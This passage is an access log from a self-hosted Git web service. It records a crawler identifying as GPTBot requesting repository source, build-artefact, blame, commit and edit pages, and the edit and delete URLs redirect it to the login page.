AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 11772] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:18:06:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 11753] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:18:06:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 27665] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js" +[17/Feb/2026:18:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 12366] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:18:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:06:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:18:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:18:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:18:06:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:18:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:18:06:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:18:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:18:06:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:18:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:18:06:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:18:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:18:06:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:18:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:18:06:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:18:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:18:06:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:18:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:18:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21734] [Gzip 28.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21737] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21737] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 9841] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:18:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:18:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 11703] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:18:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 37283] [Gzip 12.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:18:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 10669] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:18:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 10077] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:18:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 9836] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:18:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:18:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 10679] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:18:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:18:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:18:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:18:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:18:06:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:18:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:18:06:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:18:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:18:06:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:18:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:18:06:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:18:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:18:06:50 +0000] - 303 303 - GET https 